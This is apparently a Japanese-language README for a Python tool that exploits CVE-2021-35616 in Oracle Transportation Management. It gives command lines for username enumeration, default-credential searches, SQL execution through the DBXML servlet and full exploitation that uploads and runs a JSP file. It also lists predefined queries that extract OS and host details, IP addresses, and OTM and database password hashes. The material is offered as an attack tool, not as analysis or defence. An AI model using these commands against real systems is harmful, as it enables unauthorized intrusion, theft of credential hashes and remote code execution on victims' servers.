
CVE-2021-35616 を悪用するための Python ツール
CVE-2021-35616をエクスプロイトするためのPythonツール
スクリプトはモジュールで動作し、以下の順序で実装しています。
► ユーザー名列挙
► デフォルト認証情報の検索
► DBXMLサーブレットを使用したSQLクエリの実行
► 完全なエクスプロイトとJSP実行
スクリプトの構文は次のとおりです。
.\OracleOTM.py {module} {host TXT file} {additional parameters}
ユーザー名列挙: .\OracleOTM.py enum {hosts TXT file} -u users.txt
デフォルト認証情報の検索: .\OracleOTM.py default {hosts TXT file}
DBXMLサーブレットを使用したSQLクエリの実行: .\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
また、有用だと思われるいくつかの定義済みクエリも用意しています。以下のように直接アクセスできます。
.\OracleOTM.py query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – サーバーのOSを抽出
Osuser – DBを実行しているOSユーザーを抽出
Hostname – DBサーバーのホスト名
Hostip – DBサーバーのIPアドレス
Passwords – OTMユーザーとそのハッシュ化されたパスワードを抽出
Oraversion – DBのバージョン
Dbusershash – DBユーザーのパスワードハッシュ
Dbfileslocation – OS上のDBファイルの場所
完全なエクスプロイトとJSP実行: .\OracleOTM.py exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"